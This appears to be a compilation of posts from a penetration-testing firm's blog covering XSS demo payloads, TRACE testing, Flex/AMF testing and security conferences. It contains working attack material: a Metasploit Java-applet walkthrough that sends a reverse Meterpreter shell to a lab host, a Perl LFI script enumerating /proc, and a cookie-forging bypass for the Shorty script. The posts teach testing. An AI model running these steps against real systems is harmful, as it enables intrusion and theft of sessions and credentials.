Security talk at Reading Geek Night - FlasHack

Hi! Lovely summer, isnt it? :) I'm enjoying carrying out a lot of testing, researching and also a bit of developing.

But I always try to make time for sharing knowledge! I think sharing is the best part of the hacking community (and the Internet), people writing articles, blog posts and also twitts sharing their experience of computer security. And I love doing it when I can, especially as I know the people listening are passionate about the subject.

This is the reason I'm going to speak again at Reading Geek Night next week. I'll be doing a talk about how to decompile, modify, analyze and abuse Flash applications.

If you are interested in finding out how you can have some fun with Flash files and you can excuse my English and bad jokes, you are more than welcome to join me at another Reading Geek Night!

See you :)

XCampo

I'm very pleased to present you with a (more or less) usable version of XCampo!

What is XCampo? I decided to write this when I was coming back from the RootedCon conference in Madrid and it is intended to help me (and anyone who wants to use it) to generate better screenshots and demos for the report generation (and presentation) process.

Sometimes, when people generate security reports and they want to represent the risk of a XSS vulnerability they insert a simple script that shows an alert box with the name of the website or with text. This illustrates the possibility to execute anything we want and security people understand this....but do non technical people?

Using this PHP code you will get a nice page with some options to generate dynamically different payloads to your demos:

• Fake login: Generates a fake login form page to force the user to insert his login details.
• hax0r defacement: Try to generate an over-everything black layer with a text and an audio file.
• Form redirection: Redirect any form in the website to a specified URL.
• Password manager: Try to steal the login details stored in the browser when accessing to a specified webpage
• Cookie stealing: Perform a cookie steal sending the details to the URL we want.

As you can see this provides a good range of options to generate more "dangerous" demos in the presentation of the results.

Security challenges for the summer

Hello! The summer is here and the holidays are near!

Planning something to do? Too much free time as you don't have to do any exams in September? Looking for something to learn? Me too! :)

Each summer I plan something to learn, something to investigate... basically something to help me enjoy my free time! This summer I'm going to focus on:

• Firefox addons development (Check this Hackbar Google Code website)
• HTML5

I'll also try to keep my mind fit by playing online challenges games. If you want to practice and learn about security you can check the following websites:

• The Bright Shadows
• Try2Hack
• Hack This Site

Enjoy and keep out of direct sunlight ;)

A bit of information about TRACE and OPTIONS

Hi!! Another post here after a some time... I'm really busy at work right now but I also need these small breaks to carry out my own testing and share a bit of what we learn here at Pentura.

I want to write today about the TRACE, OPTIONS and others HTTP verbs. Sometimes in reports we can see that they discovered the TRACE verb active in our server. How they (us ;) ) do it? How do we test to understand if it's a real vulnerability? If it's a vulnerability... what is the risk?

First of all when we test a web application, we perform an OPTIONS request to the server to discover the verbs the server offers. It can be done using a simple telnet or ncat connection to the server but today we are going to use the Metasploit framework:

Using the auxiliary/scanner/http/options module we can easily discover the HTTP verbs we offer in www.pentura.com. In this case we only accept GET, HEAD, POST and OPTIONS :)

Sometimes we can also see the TRACE method listed in the OPTIONS request and programs will warn you about this. OK, but, is it a risk?

Before knowing if it's a risk or not we have to understand how can an attacker use the TRACE method to exploit your server. The attack is called XST or Cross Site Tracing. Using this, an attacker could steal our cookies and use them to hijack our session in the server. This is useful when the cookies have the httpOnly flag. This is a small attribute that can be applied to cookies to prevent the access to them using Javascript.

The TRACE method responds back with the same headers that we sent in the request so, if our request contains our cookies, they will come back in the TRACE response.

But... don't worry! Sometimes people add this to reports because the automatic scanner discovers it but they don't test manually if it's possible to exploit this vulnerability. I'll show you how to do it!

pedro@pedro:~$ ncat www.apache.org 80
OPTIONS / HTTP/1.1
Host:www.apache.org

HTTP/1.1 200 OK
Date: Wed, 09 Jun 2010 16:13:37 GMT
Server: Apache/2.2.12 (Unix) mod_ssl/2.2.12 OpenSSL/0.9.7d mod_wsgi/3.2 Python/2.6.5rc2
Allow: GET,HEAD,POST,OPTIONS,TRACE
Cache-Control: max-age=86400
Expires: Thu, 10 Jun 2010 16:13:37 GMT
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html

pedro@pedro:~$ ncat www.apache.org 80
TRACE / HTTP/1.1
Host:www.apache.org
X-Header: Test

HTTP/1.1 200 OK
Date: Wed, 09 Jun 2010 16:14:49 GMT
Server: Apache/2.2.12 (Unix) mod_ssl/2.2.12 OpenSSL/0.9.7d mod_wsgi/3.2 Python/2.6.5rc2
Transfer-Encoding: chunked
Content-Type: message/http

TRACE / HTTP/1.1
Host: www.apache.org
X-Header: Test

As you can see, when we send the OPTIONS verb we see that the TRACE verb is allowed. This means that we need to test it, not only put in our report as a vulnerability. The next request I made is a TRACE request with the X-Header fake value. The server responds with a 200 OK code and with my fake header value. This is the proof that the risk is present in this server. If the response is other means that the server is not vulnerable to XST attacks.

I hope this helps you understand better whats means these TRACE enabled vulnerability in the reports :)

P.D. For those Firefox lovers... Check this extension to test the OPTIONS headers inside your browser: HTTP Resource Test

Defcon CTF Prequals

Short post today to share with you my happiness as tonight start the Defcon prequals to gain access to the Las Vegas event!

I'm playing with some Spanish mates in a very small team (we are three and usually Top 10 teams are 10+ players) with a lot of illusion to enjoy at least the same as the last year.

They usually do cracking, reversing, web, exploiting, forensic, etc. challenges and we will do our best to solve them. Even if you don't complete a challenge you always learn something new in the process.

I'll make next week a resume about how we did in the prequals and how to solve some of the challenges we manage to complete (if we can complete at least one...)

Ahh!! I almost forget!! You can still register in the competition!!

HOWTO: Using MBSA remotely

When it comes to performing a security assessment of Windows servers (SQL, ISA, IIS etc), the Microsoft Baseline Security Analyzer (MBSA) tool provides a good idea of the key security settings implemented on the Windows server being audited. 

 MBSA v2.1

One drawback though is MBSA v2.1 needs admin privileges on the remote Window server and offers no way of specifying alternate admin credentials in its GUI...what if you're MBSA client isn't even in the same domain??........

Using the "runas" command from Windows Command Prompt, its possible to specify the remote servers admin credentials for use with the MBSA executable:

'runas' command with custom credentials and mbsa.exe

In this screenshot, we used the local admin account on 'WIN2K3TESTSVR' rather than a domain account.

NOTE:  The '/netonly' switch is a must, this tells your client to use these credentials when making a remote connection.  If you dont use this switch, when you hit Enter, wWndows will try and verify these credentials which will most likely fail.

When MBSA starts, specify the IP address of the remote server 'WIN2K3TESTSVR' and click 'Scan'.  MBSA will now use the credentials you specified on the command line.

NOTE:  If you are scanning IIS servers, you will need to have the IIS Common Files installed on your MBSA machine so that a number of the IIS scripts will run correctly.  MBSA will soon let you know that a scan was incomplete because it could run the necessary IIS checks.

New version of Wfuzz!

I don't like automatic tools. Full stop. Well... not full... I like some semi-automatic tools.

One of these tools is wfuzz. I love this python script to perform a quick look over all the directories in a website and sometimes to test against some basic authorization bypass fuzzing a numeric parameter.

The use of this tool is very easy and I'm not going to explain here, you can read the README file from the package but I'm going to explain you some of the changes in this new version.

First of all if you want to download it you will need a subversion client as they are starting to use Google Code to distribute wfuzz and they don't offer any zip file right now.

Then you can test it as I show in the screenshot:

python wfuzz.py -z file -f wordlist/general/common.txt --hc 404 -c -t 1 http://test.acunetix.com/FUZZ

If you are a wfuzz user you already notice the inclusion of the chars column in the result output. This can be useful when either lines and words are the same in a specific page. First new feature!! You can filter using the number of chars with the --hh parameter

Other of the differences in this new version is the inclusion of more dictionaries. Now they add more and split them into categories:

pedro@pedro:~/wfuzz$ tree wordlist/
wordlist/
|-- general
|   |-- admin-panels.txt
|   |-- big.txt
|   |-- catala.txt
|   |-- common.txt
|   |-- euskera.txt
|   |-- extensions_common.txt
|   |-- medium.txt
|   |-- megabeast.txt
|   |-- mutations_common.txt
|   |-- spanish.txt
|   `-- test.txt
|-- Injections
|   |-- All_attack.txt
|   |-- bad_chars.txt
|   |-- SQL.txt
|   |-- Traversal.txt
|   |-- XML.txt
|   `-- XSS.txt
|-- others
|   |-- common_pass.txt
|   `-- names.txt
|-- stress
|   |-- alphanum_case_extra.txt
|   |-- alphanum_case.txt
|   |-- char.txt
|   |-- doble_uri_hex.txt
|   |-- test_ext.txt
|   `-- uri_hex.txt
|-- vulns
|   |-- apache.txt
|   |-- cgis.txt
|   |-- coldfusion.txt
|   |-- dirTraversal-nix.txt
|   |-- dirTraversal.txt
|   |-- dirTraversal-win.txt
|   |-- domino.txt
|   |-- fatwire_pagenames.txt
|   |-- fatwire.txt
|   |-- frontpage.txt
|   |-- iis.txt
|   |-- iplanet.txt
|   |-- jrun.txt
|   |-- netware.txt
|   |-- oracle9i.txt
|   |-- sharepoint.txt
|   |-- sql_inj.txt
|   |-- sunas.txt
|   |-- tests.txt
|   |-- tomcat.txt
|   |-- vignette.txt
|   |-- weblogic.txt
|   `-- websphere.txt
`-- webservicces
    |-- ws-dirs.txt
    `-- ws-files.txt

They also add three points to the changelog:

• Added hexa-rand payload (Thanks to Alice Kaerast)
• Fixed encoding problems (Thanks to Osama Elnaggar)
• Fixed problems in the headers parsing (Thanks to Osama Elnaggar) 

I just update my tools folder with this new version and now we can keep our version update using svn :) Nice work guys!!

Infosec'10 metadata (I)

Wops! A long time without writing here... A lot of work and not too much time to write. But I'm going to try to fix it shortly!

Two weeks ago was the Infosec event at London. Our company had a very nice stand and I spent a good time Wednesday talking with some people about what we do and, more specifically, what I do as application tester at Pentura. But I can not stop thinking about security in any moment...

Others companies in the event were giving some CDs with documentation and programs. As I know that sometimes people don't take care about what they copy into the CDs when they make the copies so I took some of them to analyze :) They had been burning in my backpack for two weeks!! But today, when I inserted the first one, it makes my day.

The CD is from (ISC)2 and they call it Green disc. They have a lot of docs I'll analyze some point this week but I discovered something very funny. They are using WS_FTP. How I know it? They left the WS_FTP.LOG files in some of the folders. Take a look:

This file contains the local path of the file (you can get the user name), the remote path of the upload (you get the path) and the IP of the remote server (need I say more?) You can found a lot of WS_FTP.LOG files at Google or, if you got the CD from the (ISC)2, have a quick look to these files ;)

Cheers!!

P.D. Maybe is not a (ISC)2 IP but still funny (and not very secure...), isn't it? :)

Shorty Authentication Bypass

(This post was posted originally at my personal own blog and also featured in the exploit-db.com website)

Today, reading some stuff at internet I have found an article about 7 PHP scripts to generate shorts URLs. This kind of links are very common today with a lot of controversy about the security risk that they implied. I’m not here (now) to discuss about shorting URL’s services but to talk about a stupid bug that I have found in the first (!!!) software that WebResourcesDepot recommend today.

Shorty is a script very old… From 2006. Why are they recommending it in the first place? Second: Did they try to install it? A lot of errors appears when you try a fresh install and some pain until you can fix it. Buggy from the scratch.

I then decided to read some source code. I have found that in functions.php is some bug that we can use to bypass the login form. Let's go to read some php code:

function authenticate(){
    $cookie = @$_COOKIE['snickerdoodle'];
    if($cookie == "polarbears"){
        //
    } else {
        exit("Not logged in.");
    }
}

function verify(){
    if(@$_COOKIE['snickerdoodle']){
        $cookie = $_COOKIE['snickerdoodle'];
    } else {
        $cookie = '';
    }
    if($cookie == "polarbears"){
        return 1;
    } else {
        return 0;
    }
}

As you can read this code generates a cookie with the name “snickerdoodle” and the value “polarbears” to determine if you are authenticated or not. Its very easy to create a new cookie into your browser with this data with some Firefox extension. If you are using a browser without extensions like Google Chrome you can try to write the next javascript sentence into your URL:

javascript:document.cookie=”snickerdoodle=polerbears”;

If you don’t want to install Shorty (and mess around with all the hacks you have to do use it) you can always use the search intitle:”Shorty (Beta)” to found some places to test it.

Have fun!

The danger of the default files

(This post was originally posted in my own personal blog)

During my current research I have found some default files that some web frameworks includes into their installations that can compromise the security of a website. It also can allow an attacker to determine which framework a web page is using.

The first of these files is from the symfony framework. They offer to the developers a useful script called frontend_dev.php which show internal information about the current install and the server. As you can see in the following screenshot the information can be very useful…



It’s deactivated by default and can be activated changing the “lib\config\config\settings.yml” file:

# Logging and debugging settings

web_debug: false # Enable the web debug toolbar

By default the framework is configure not to show the toolbar, but a lot of web pages (indexed by Google) have activate it and allow to any user to read the private data of their websites.



Moreover another default files that I found researching into the default Zend Server installation are the alias /server-info and /server-status. These are part of the mod_info module and, hopefully, in Zend Server, are configured to be access only from localhost:

<Location>
SetHandler server-info
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

<Location>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

This is a secure default configuration that other domains using this Apache module should adopt for the security of their web pages. This is a problem discussed sometimes ago with the revelation of the /server-status file in twitter.com. It’s also known that other servers like Apache.org are offering his status and his info, but you can also found a lot of websites sharing their server-status and server-info pages.

I have found that these default files are not include in the wordlist of wfuzz or even Wikto. I don’t know why are they ignoring these files, but I’m going to add these to my default dictionaries files :)

Cheers!

Pentura is Delicious!!!

Well... maybe I did the easy joke, but I couldn't resists!!!

I had never use any kind of bookmarks, even local ones. I try to remember the links or at least the keywords of the article or post to be able to localize it later using Bing or Google. But today I change something in my life... well, at least in my working life :P I'm starting to use bookmarks!

I added a small box in the right of the blog showing the RSS of the new delicious account I created for Pentura to store all these links about security I consider interesting around the web. Some of them will be in Spanish (I'm sorry...) but you can easily translate them using online translators :)

I also added my personal twitter account, where you can follow my public timeline with funny security jokes, thoughts about how stupid can be sometimes the bugs I found and maybe personal stuff between friends around the world. Again I'll try to keep it in English, but sometimes replies goes in Spanish.

Bye!

Web security news and the "Hack of the Year"

Long time since my last post but I was a bit busy on customer on-site testing. Nice days of application testing but now is time to write here again.

I read long ago a fantastic book about security named "The Art Of Intrusion" wrote by the (in)famous Kevin Mitnick. He told amazing histories about security and intrusions without giving too much technical details about them but the enough to understand the attack and catch the idea behind the security problem the system had. News about security are (sometimes) the same. I said "sometimes" because reporters who wrote about security doesn't really use to know anything about security, but this is something to another post...

Today I want to introduce you two websites about web security / cracking. The first one is a website that intends to collect all these web security incidents around the world. It's called The Web Hacking Incident Database and offers reports of the hacked websites around the world, including, in most of the cases, some technical information. It's worth a lecture to understand how important is the web security nowadays.

The other one is really a clone of the famous milw0rm website (I'm not going to link it because is currently abandoned) called Inj3ctor.They published a few days ago a paper claiming that they had hacked Facebook. Wooohhh... really? Let's go check the report:

• They start doing a port scan of facebook.com
• After that they do some simple Google search queries trying to identify some PHP errors because is well know that Facebook is developed in this language.
• A quick look into the robots.txt file can focus us into specific (and usually privates) web pages.
• After these tests against facebook.com they move to apps.facebook.com and detect some vulnerabilities in third parties applications. These applications are not developed by Facebook and are not hosted in the Facebook servers.

They got a lot of information from MySQL databases using simple SQL Injections and claim that the information they obtained is from Facebook. Ok, sometimes people get really excited too soon. In this case the called it: "Hack of the year!".

If you are going to call something the "Hack of the year" be sure it is... Because:

1. Facebook doesn't use MySQL, they use Cassandra.
2. The path showed in the PHP errors points clearly to another server (http://tomkincaid.dreamhosters.com/)
3. Wordpress? I'm pretty sure that is not any Wordpress installation running in the Facebook servers.
4. Don't say your exploit is the "Hack of the year", wait until the community say it: http://pwnie-awards.org/

That's all for now, more other day with an exciting project I want to release in any point next week :) Cheers!

Process command line enumeration using LFI

This week during a pentest I discovered a website vulnerable to Local File Inclusion vulnerability. As I wanted to discover the most information possible about the system I decided to retrieve the running process and the command line used to execute these programs. With this I pretended to discover more services and paths in the system.

I wrote a very simple Perl program that can be modified very easily to other scenarios :)

#!/usr/bin/perl -w
use LWP;
my $browser = LWP::UserAgent->new;
my $url = 'https://URL/load?file=../../proc/';
for($i = 0; $i < 9500; $i++){
my $response = $browser->get( $url.$i."/cmdline" );
if($response->content !~ m/^$/i) {
print $i . " : " . $response->content ."\n";
}
}

Enjoy!

Back from RootedCon 2010

I know, I didn't write anything about the Rootedcon as I promised last week but following the congress I came up with some new ideas and I have been busy coding them.

I don't know how to describe the congress. Simply amazing is a good approach. I met a lot of fantastic people and saw a lot of friends again. And, of course, we talked and learnt about security, so, what more I can ask for?

The first day (the Thursday) we had some less technical sessions about how to start a career as pentester and the actual situation of the national (Spanish) security. We also received a very interesting speach about computer forensics. The day ended in a pub near the congress place talking with the speakers and meeting people I only know from Internet.

Friday was a very intense day. The most technical sessions took place on this day. Also the CTF (Capture The Flag) tournament started. It was a shame that I was unable to participate, but I didn't want to miss any of the sessions, maybe next year! ;) We saw some 0-days exploits in the conferences: One for airodump, another for a support ActiveX program widely use in some big companies such as Telefonica and Symantec and others for the Oracle Financials 12. The most technical speach was the presentation of the Radare2 tool. Very low level programming and high level concepts which was difficult for me to understand. I'll try to download it and understand better how it works and how to use it.

Last day the sessions were very interesting too. Android forensic, metadata security, cryptography, botnets and one about hackers in the comics too! It was a very good mix of themes to finish the event. Also we had dinner with almost all the speakers so we kept talking about security even after three days. After dinner we went to a party but I'm not going to comment on this... ;)

I have to admit that after the congress I was really tired but also shocked! I met all these incredible people who know a lot about security making me realise that I need to keep studying and researching because out there are more things that I can imagine... and I want to learn them all!

P.S. I'll try to add the slides of the rest of the speaks when they release them. They release the slides today and you can see them online at Slideshare.

Rooted Con 2010

I'm today at Madrid, at the first Rooted Con conferences. They are going to be in Spanish only but I'll try to post a small report of all the things they show here.

Is planned the release of two 0days bugs. One in the Oracle Financials 12 software and other in an undetermined software. I'll post more details about they :)

Also we are going to have another great speaks about well-know pentesting tools. One of them is going to be about the release of Wifislax 4.0 by Sergio Gonzalez. It's a live-cd linux distribution focused on wifi networks intrusion testing and I'm expecting a great work and for sure some new functionalities.

Other tool to be released is the Foca 2.0. Foca is a fingerprinting tool to map a company network using the metadata included in the documents all companies offers in their websites. In this second version they integrated it with the Shodan search engine and the option to perform a DNS zone transfer attack. I know very well the people behind this tool and I know is going to the an impressive release :)

But no all is going to be releasing new tools, we are going to have also speaks about other topics like forensic, rootkits and hacker's world in comics! Looks for me like a very complete conferences.

I have to leave you now because the first speak is going to start...

2010 CWE/SANS Top 25 Most Dangerous Programming Errors

A few weeks ago was released a new version of the "Top 25 Most Dangerous Programming Errors" list about coding bugs that the MITRE and SANS released last year. This new version comes with a better layout to a better understanding about the risks, the remedies and focus into the identification of the problem.

From my point of view is very interesting the table which defines the weakness by language. I miss the presence of ASP.Net in this list but it can be equated to JSP in most of the cases. In my experience as web pentester I have my own "personal ranking" of insecure web applications. From the most common secure applications to the less one are:

1. ASP.Net
2. JSP
3. Perl/Python
4. ASP
5. PHP

This is not a fact! It's only based on my personal experience in my years of web security testing. I'm open to discuss this ranking ;)

I'm also impressed to see how many of these coding bugs are specifically related to web (or mostly associated with web applications). Web applications are becoming more popular everyday (they are already) and with the rising of the cloud computing they are going to become more and more popular even in the Intranet applications.

Documents like this helps developers to build more secure applications and to application tester to identify and document better these bugs that makes our days :) Enjoy reading!

Testing and virtual machines

Sometimes I need to test specific software version or make a custom machines for a specific propose like developing in a particular language. For now I used my personal machine for it, but today I have discovered something that I'm planning  adapt to my day by day.

I was a bit lazy about creating virtual machines because I need to download a whole CD image, install it and later configure it. Today I discover TurnKey Linux website. They have a lot of virtual machines and ISO images of preconfigured Linux machines. They are based on Ubuntu 8.04 Server LTS so I have a platform I'm familiar with and very cool (and secure!) preconfigured options.

Well, maybe I'm being a bit enthusiastic but the LAMP machine looks really good in my initial tests. I'm planning to give in a try to other machines too like the Ruby On Rails machine or the Revision Control one.

These machines give me the ability to create fresh machines from scratch with a lot of dirty work already done. And I love it :)

If you are looking for more complex machines for testing you can found some preconfigured web security testing machines. They allow you to play with some vulnerable web pages and measure your skills without breaking the law.

• The OWASP is hosting a project called "Broken Web Applications Project" who offers a virtual machine to test different vulnerable software. You can check online the list of vulnerable applications included.
• Recently was released the version 1.0 of Web Security Dojo, which includes vulnerable applications and some web security related tools, as Brup proxy or w3af.

And it is all for today, I have some things to test... ;)

Mixed content in different browsers

In security, one of the most old and famous attacks is Man In The Middle attack. With this technique we can read all the packets the user is sending to a server and analyse it. The solution? Use a secure layer to encrypt all the traffic.

This, for web sites, require that the user browser use the HTTPS protocol. This relay in the authenticity of the server certificate and the trust relation between the browser and the certificate authority. It can be broken, but is not the point of this post, maybe for other one :)

If a website mix secure (HTTPS) and insecure (HTTP) content in the same page an attacker sniffing the net will be able to see, for example, our session cookie in clear text. This is a big risk if the attacker has control over the web content we are browsing (using a stored XSS attack) and insert some insecure reference on it to catch our cookie session.

The way the browsers controls this is different in each one, but always insecure. The last version of Internet Explorer can be configured to check if we are loading insecure resources and block them. The result is that we don't see the insecure images if we decide to block. But it's really blocking the resources or only hiding them?

I create a secure web page which load different (mixed) content. Using Wireshark to look the request my browser is doing I can determine that IE8 is currently making the request and, if the user decide to "block" it, only hide it.

 

This can make the user think he is safe when the request (and his cookie sessions) has been sended in clear text.

The other browser I tested is Firefox. When Firefox detect mixed content it load it and show an alert to the user to warn him about it. This is the same insecure process that Internet Explorer, but in this case the webpage is render normally so the user doesn't have the false security feeling when the images are blocked by IE.

I, a huge fan of Firefox and the possibility to expand it using addons, have created a Greasemonkey script to try to prevent this insecure behaviour of Firefox. It's called Mixed Content Protection and can be installed from the userscripts community web page. It requires Greasemonkey to work.

The script is very simple. It works only when we are accessing to HTTPS web pages and search for all the insecure references* in the HTML source code. It executes before the page loads, so it can change "on-the-fly" all these insecure references for the secure ones. If the secure object is not accessible it will not be loaded using a insecure protocol.

Currently it search for:

• All src attributes: img, iframe, object, script, etc.
• The href attribute of link tags for css files
• The insecure value in the param tag to the movie resource.

I think with these references it will cover mostly of the cases but, if you know any other resource can be loaded insecurely, please, feel free to comment me. Also it can fail in some cases, if you detect any issue please let me know :)

* Currently the script only works for the body tag elements, so any insecure reference in the header of the file will be load. It also doesn't work with resources loaded from Javascript or CSS files.

Thanks to Chema Alonso for draw my attention[Spanish blog, sorry] to this web browsers issue.

Testing Flex applications (III)

Today, after understanding how Flex applications works and how analyse Flex applications to obtain the list of services and methods, we are going to discuss how to pentest Flex apps to try to generate our fake AMF packets.

deblaze

This tool has some good and bad points in the testing of Flex applications. Being a console tool is very easy to generate automatic scripts with it or add some functionality it doesn't have. Otherwise it only sends basic objects types (int, long, string...) and not more complex ActionScript objects. It's going to be a problem when we are testing large and complex applications.

Test the remote gateway using deblaze is easy. Knowing the name of the service and the method we can get the list of all the players with the following parameters:

python deblaze-0.3.py -u http://digitalshowcase.biz/demos/players/zendamf.php -s Players_service -m read_Players

We can also send parameters to the method using the -p modifier. The parameters need to be separate using the | char. (p.e. -p 1|string|3)

This was a limitation we found in a recent test that we need to solve. Some of the methods we were testing are methods that receive a boolean (true or false) value. As we can modify the code we made a little piece of code to make the trick. We send it to the creator of the tool and he promised us to add it to the next version. But, if you want to use it now, you can use this version of the file: http://www.pastebin.com/f6a1321dd It add the support to send true or false values setting as parameter value the string "true" or "false".

Charles Proxy

It's a commercial tool that decrypt the AMF packets and allow us to modify and reply them to the gateway. As we showed in the previous post it generate a list of valid request that the application make while we are using the Flash interface.

The main feature of this program is the ability to tamper the request to server and modify them on fly. It also allow us to modify more complex object data. As you can see in the screenshot below we can modify the PlayerVO object.

 

It is very useful in large apps with a lot of AMF objects. It also allow us to break the responses before they are passed to the Flash object, so we can change, per example, a "false" response for a "true" one and test the application against this kind of privilege escalation vulnerability.

Pinta

We are introducing Pinta today. It is an Adobe AIR application so the AMF protocol and the packet sending is going to be 100% equal to the Flash application. Again, as with the deblaze tool, we need to know previously the gateway, the services and the methods to recreate the request to the server.

After specify the gateway the tool ask us for the services, methods and parameters. We can specify different parameters for each method to test different injections. We can also send complex object data using the JSON language.

 

In this case, the PlayerVO object send was: 

{"country":"ES","jersey":"77","player_name":"Test","pos":"PG","team_name":"Atlanta Hawks"}

As you can see the possibilities to send, alter and try to bypass the security of a Flex applications are a lot and we need to know them all to use the most appropiate in each pentesting. For the next chapter (and probably last one) we will make some SQL injections into the application using the previous tools.

Will you tell your enemies where you are?

In the current society where everyone has a 3G mobile, a Facebook account, twitter username and more, sometimes we forgot about our privacy.

These days is becoming very popular the Foursquare web site. It's a very simple social game where you can tell your friends where you are. This is a nice way to meet new sites and catch your friends whatever they are. Foursquare also offers badges for different actions to incentive people to use their application. It also send tweets using our Twitter account telling our friends where are we if we configure it. It's funny!

But this can be a very high risk for our privacy. If our twitter account is public anyone can know at any time where we are. This principle is the one behind the Please Rob Me web page. They use a simple search on Twitter, 4sq -@foursquare, which returns all the automatic generate tweets from the Foursquare web site. These tweets are send when we check-in in a place. People telling everyone where they are? Scary... But wait! It's another web page that offers the same service. It is Gowalla and, again, we can know where is the people who is using this web site: gowal.la -@Gowalla

Right now it is more funny than dangerous but the important point behind this web page is that in the actual society the people give away their privacy. Some years ago (not too much, only 2 or 3...) our personal data was the most important thing for ourselves but nowadays we don't really care about it. We publicity everywhere where we are, what are we doing and, sometimes, pictures or videos.

Our recommendation is to keep your data the more private the applications allow you and try to think twice before posting any data (text, image or video) at Internet. Once posted sometimes is difficult to delete it...

Oh, by the way... I have a public twitter account! You can follow me at @p_laguna for all my security related tweets.

Testing Flex applications (II)

In the previous post we manage to extract some information from the SWF file and understand the structure of the important part in a Flex application. In this chapter we are going to automatize the process of extraction and analysis.

If you are sharp-eyed you probably saw the "deblaze" name in the past post screenshots. This is the name of the first tools we are going to use today and can be found in the deblaze website. You can also found some great examples about the use of the tool.

The first step to analyze with deblaze a SWF application is execute deblaze with the -f parameter, passing the swf URL.

 

Sometimes deblaze is able to determine the gateway technology but in this case it doesn't work. Also deblaze is falling detecting the Service name. Why? Well, we have, in this case, access to the source code and we can determine that the service name is Players_service:

This is because deblaze is extracting the information from the XML that we see in the last post. In this file is referenced the zendamf service, but the real one is Players_service. If we don't have access to the source code we can make a quick search at the swf bytecode:

Also we can see the name of the methods the players_Service is offering to the users. Each method require some parameters that we can also found reading the bytecode.

This parameters can be simple objects like integers, booleans or strings but also can be more complex data as custom objects. In this case the parameter send with the add_Player method is a PlayerVO object. To analyze this object we have the possibility to analyze (again) the swf code to get the data.

This, of course, can be inferred by the possibility to analyse the living app to generate the add_Player action and catch the request using a local proxy tool. Charles Proxy has the ability to show clear text AMF messages between the server and the application.

As you can see Charles Proxy shows us the name of the service, the method and the parameters that the swf file is sending to the gateway. Using this tool and navigating for the web page we can generate a tree of request that will expose mostly all the request that the application has defined.

This way to analyze the application is less painful but we can also miss some important (or administrative) function that is not accessible for a normal user. We recommend do both for a better understanding of the whole application.

Flex gateways can be requested from outside the swf file and in the next post we will cover how to generate fake request to test the server.

WeFeTe

I'm proud to announce the release of WeFeTe. WeFeTe is a very simple tool to test against common configurations in web frameworks. It can be use as a first approach to detect the programming framework without missing any of the default behaviours that frameworks include in their websites.

This first release try to detect the following frameworks:

• CakePHP
• CodeIgniter
• FUSE
• Kohana
• TYPO3
• Zend
• Zope

It's very buggy and all the suggestions are welcome :) Next versions will have more frameworks and maybe an improve UI. Also expect some posts about funny histories about framework default files and (in)security by default ;)

Testing Flex applications (I)

A few weeks ago we were involved into a Flex application pentesting. We are going to explain in a serie of posts how Flex applications works and how we test them.

Flex applications combined two parts: the client side SWF file and the AMF gateway, and both communicated using the AMF protocol. AMF protocol (ActionScript Message Format) is a binary packet which contains serialized data: service, method and objects. This packet is send to the server gateway, which manage the communication or actions requested by the Flash application.

As the Flash object is store in our machine we can extract all the information and use it to generate our custom request to the server without using the proper Flash application and allowing us to modify the parameters to test them against common injections and trying to extract more information from the error messages.

For the extraction of the information from the swf file we use the swfdump. It extract the bytecode of the file and output a more or less readable code. We are going to use for demo propose the app located at http://digitalshowcase.biz/demos/players/Players.swf. This is a demo application from Adobe.

The first step is extract the code from the application. The swfdump command accepts the -D parameter to extract all the information. We are also going to redirect the output to an external file for later analysis:

 

Sometimes we can see warnings but this has not to be a problem. We will be able to analyse the relevant information anyway. The next step is analyse these txt file to find the gateways it is using with a simple grep query:

 

With this XML we know the URL where we have to send our AMF packets and the destinations (services) which the server offers to the application. Now is time to extract the methods of these services:

The string [staticprotected}Object}:: is the key to identify all the methods that the gatewayis expecting. We also have near it the number of parameters that the application is expecting.

This is our first approach to the Flex security but we will discuss in the next chapter how to request these methods and how to test them using semi-automatic tools.

HOWTO: Metasploit Java Applet Attack

Using a recent Java exploit released by Nathan Keltner of The Metasploit Project, Pentura Labs are going to demonstrate how to inject a Meterpreter payload into a browser session via a Java applet.

To get this attack working. you'll need to get your victim to click the attackers URL via whichever method you choose (email, verbal, linked from a website etc.). Once the applet has been executed, your payload is delivered and running......

For this demonstration, we'll use two machines in our lab; one running BackTrack4 with Metasplot Framework 3 (MSF3) and the other running Windows Vista SP2 with IE8 and/or FireFox v3.5. As this attack use a Java applet and a victim running Java Runtime Environment (JRE) the browser shouldn't matter, its the responsibility of JRE to execute the applet.

Setting up BackTrack4 (BT4)

A bit of preparation is needed with BT4 before we begin, here's what to do:

Install Sun Java JDK and rjb gem, then set global variables:

root@bt: apt-get install sun-java6-jdk
root@bt: gem install rjb

Set global variables for Metasploit to use JDK:

root@bt: echo "JAVA_HOME=/usr/lib/jvm/java-6-sun" >> /etc/bash.bashrc
root@bt: echo "export JAVA_HOME" >> /etc/bash.bashrc
root@bt: JAVA_HOME=/usr/lib/jvm/java-6-sun
root@bt: export JAVA_HOME

>> Be sure to update Metasploit Framework, this is done from the working directory of MSF3:

root@bt:/pentest/exploits/framework3: svn up

Setting up Windows Vista SP2 with SUN JRE

JRE v1.6.0_15 was installed on our machine, grab it here

Setting the exploit in Metasploit Framework 3 (MSF3)

Here we choose our MSF3 Java exploit, set some exploit options and then choose our payload that will be loaded in the Java applet.

Start the MSF3 console and set ' java_signed_applet' as the exploit

use exploit/multi/browser/java_signed_applet

Set the target type, in this case, TARGET 1 is for our Windows Vista machine

set TARGET 1

Set the MSF3 listening IP address for the web server

set SRVHOST 10.2.4.200

Set the MSF3 listening TCP port for the web server

set SRVPORT 80

Set the URI Path. This will form the URL that we'll entice the victim to visit (e.g. /pentura)

set URIPATH pentura

Specify our payload to run with the Java applet, we're going to use a Meterpreter payload where the Windows Vista machine will connect back to our BT4 machine.

set PAYLOAD windows/meterpreter/reverse_tcp

We need to set some options for the PAYLOAD itself. In this demo, our meterpreter payload will have the victim connect back to our attacker machine on TCP port 4444

set LHOST 10.2.4.200
set LPORT 4444

Now we'll start having some fun, run the exploit in MSF3. You'll see MSF3 start a web sever and listen out for connections

On the Windows Vista machine, we'll start a browser and connect to http://10.2.4.200/pentura. Observing the MSF3 console, we see the connection inbound from the victim. The MSF3 web server gets ready with the Java applet and then a Java applet cert warning appears in the browser, click "Run" (or "Accept" in some JRE versions).

Once the users accepts and runs the applet, back on the MSF3 console we see the Java applet is delivered and a Meterpreter session is spawned (session #1).

Lets go ahead and connect to the Meterpreter session #1 and see if we can get a command shell on the victim machine

sessions -i 1
shell

